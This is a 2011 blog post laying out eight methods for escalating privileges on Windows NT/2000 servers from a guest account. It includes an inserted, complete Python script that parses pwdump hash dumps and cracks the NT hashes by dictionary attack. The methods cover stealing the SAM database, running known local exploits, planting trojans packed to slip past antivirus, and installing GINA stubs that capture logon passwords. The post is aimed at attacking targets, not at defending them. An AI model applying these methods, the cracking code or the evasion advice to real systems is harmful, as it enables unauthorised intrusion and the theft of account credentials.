
Friday, 11 November 2011

Summary of privilege-escalation methods on NT/2000

The general process is as follows:

Method 1:
Grab the target's %SystemRoot%\repair\sam.* and take it away to crack with l0pht (L0phtCrack). As long as you can get hold of the file and are willing to spend the time, it will crack.

Problems: (1) You may not be able to read the file at all; that depends on who you are running as and on the permissions the target has set.
(2) The file is only the account database as of the last repair-disk/backup run (possibly as of the original installation), so any accounts changed since then are not in it, and the hashes you recover may be stale.

Method 2:
Use pwdump (bundled with l0pht; does not work on 2000) or the standalone pwdump2 to dump the current local user list together with the password hashes, then crack that list with l0pht.

Problem: usually you are only a guest. When you run cmd through the Unicode vulnerability you are IUSR_computername, a member of the Guests group, and that account has no permission to dump the hashes.

(The two methods above are offline.)
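Both offline methods end the same way: a list of `user:rid:lmhash:nthash:::` lines goes into a cracker. The following is an added example, not code from the original post, of what that cracking step does at its simplest: parse pwdump-style output and run a dictionary attack against the NT hashes. MD4 is implemented inline so the script runs offline (hashlib's md4 is often unavailable under OpenSSL 3). The dump and the word list are constructed sample data, not hashes from any real system.

```python
"""Added example: parse pwdump-style hash lines and dictionary-attack the NT hashes.
The sample dump and word list below are constructed for illustration."""
import struct

# Well-known sentinel values that appear in pwdump output.
LM_EMPTY = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of the empty password (LM not stored)
NT_EMPTY = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """MD4 as specified in RFC 1320 (three rounds of 16 steps per 64-byte block)."""
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)          # bit length, little-endian
    r2_idx = (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)
    r3_idx = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(16):                          # round 1: F = (b & c) | (~b & d)
            f = (b & c) | (~b & d)
            a = _rotl((a + f + x[i]) & 0xFFFFFFFF, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                          # round 2: majority function
            g = (b & c) | (b & d) | (c & d)
            a = _rotl((a + g + x[r2_idx[i]] + 0x5A827999) & 0xFFFFFFFF, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                          # round 3: xor
            h = b ^ c ^ d
            a = _rotl((a + h + x[r3_idx[i]] + 0x6ED9EBA1) & 0xFFFFFFFF, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a0, b0, c0, d0 = ((a0 + a) & 0xFFFFFFFF, (b0 + b) & 0xFFFFFFFF,
                          (c0 + c) & 0xFFFFFFFF, (d0 + d) & 0xFFFFFFFF)
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> str:
    """NT hash: MD4 over the UTF-16LE encoding of the password, no salt."""
    return md4(password.encode("utf-16-le")).hex()


def parse_pwdump(text: str) -> list:
    """Parse 'user:rid:lmhash:nthash:::' lines into dicts; skips blanks and comments."""
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < 4:
            continue
        rows.append({"user": parts[0], "rid": int(parts[1]),
                     "lm": parts[2].lower(), "nt": parts[3].lower()})
    return rows


def lm_stored(rows: list) -> list:
    """Accounts whose LM hash is present: crack those first, LM is far weaker than NT."""
    return [r["user"] for r in rows if r["lm"] != LM_EMPTY]


def crack_nt(rows: list, wordlist: list) -> dict:
    """Hash every candidate once, then match against every account (unsalted, so
    one table serves all users). Returns {user: password} for the ones found."""
    table = {nt_hash(w): w for w in wordlist}
    found = {}
    for r in rows:
        if r["nt"] == NT_EMPTY:
            found[r["user"]] = ""          # blank password, nothing to crack
        elif r["nt"] in table:
            found[r["user"]] = table[r["nt"]]
    return found


# Constructed sample dump (not real data). Administrator and svc_backup both use
# "password"; Guest has a blank password; the last entry is a placeholder hash
# that no word list will contain.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
nobody:1002:aad3b435b51404eeaad3b435b51404ee:ffffffffffffffffffffffffffffffff:::
"""
WORDLIST = ["123456", "password", "admin", "letmein"]

if __name__ == "__main__":
    rows = parse_pwdump(SAMPLE_DUMP)
    print("LM stored for:", lm_stored(rows))
    print("cracked:", crack_nt(rows, WORDLIST))
```

The two sentinels are worth memorising: an LM field equal to `aad3b435b51404eeaad3b435b51404ee` means no LM hash is stored, and an NT field equal to `31d6cfe0d16ae931b73c59d7e0c089c0` is a blank password. Because NT hashes are unsalted, identical hashes in a dump mean identical passwords, which is why one hash table serves every account at once.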

Method 3:
Use enum or a similar tool to guess passwords remotely over the network.

Problems: (1) If the target has account lockout enabled, a few failed guesses lock the account and you cannot continue against it.
(2) The target must accept NetBIOS connections; if a firewall filters them, this does not work at all.

The methods above obtain a password by cracking or guessing. There are also ways to elevate an existing user directly, or to add a new user.

Method 4:
getadmin (NT4) and pipeupadmin (2000): run locally, they add the current user account to the Administrators group.

Problems: (1) getadmin was fixed by a hotfix in SP4 and no longer works; an enhanced version of getadmin appeared later, but it does not seem to work under SP6a either.
(2) pipeupadmin can be run successfully as Guest, but a patch is now available for it.

Method 5:
The Network DDE service vulnerability in Win2000 allows executing arbitrary programs, which can be used to change passwords, add users, and so on.

Problem: running the exploit requires a real user account; Guest will not do.

Method 6:
The Win2000 input method (IME) vulnerability lets you run programs locally with elevated privileges; if Terminal Services is enabled, it works remotely as well.

There are also indirect approaches.

Method 7:
Trojan: upload a trojan and run it. After the next reboot it runs with the privileges of the locally logged-on user, which is very likely an admin.

Problems: (1) Antivirus software may stop your trojan from running.
(2) Some trojans do not seem to run under Guests, probably because of how they install their autorun entry: the account has no permission to add to the autorun locations in the registry, and cannot write to %SystemRoot%\system32 (as far as I know, ordinary trojans rename themselves and copy into the system directory; if you lack write permission there, they cannot run).
If anyone has tested this, please share the results.

One more note: although ntshell is not really a trojan (I position it as a remote-control tool), when I implemented its autorun I did not copy anything into the system directory; it just references the current program (or another program you specify), so write access to system32 is not required, though you do need write access to at least one of the autorun locations.

Solutions: (1) You can pack the trojan with a packer to get past the antivirus signature; try aspack. I once packed one successfully and it got past the release version of Kingsoft Antivirus (金山毒霸). Some trojans cannot be packed, though, such as 冰河 (Glacier).

Method 8:
GINA / ginastub trojan. Although this is also called a trojan, it works quite differently from the one above: an ordinary trojan installs a server component on the target, and once that is running you use a client to connect and operate it. A ginastub is usually a single DLL that has to be installed and uninstalled by hand; it is not a client controlling a server, it simply captures the logon password.

Problem: installation is fiddly, the chance of success is low, and if it is installed incorrectly the target system may no longer boot. For concrete usage, see the GINA example I ship with ntshell.
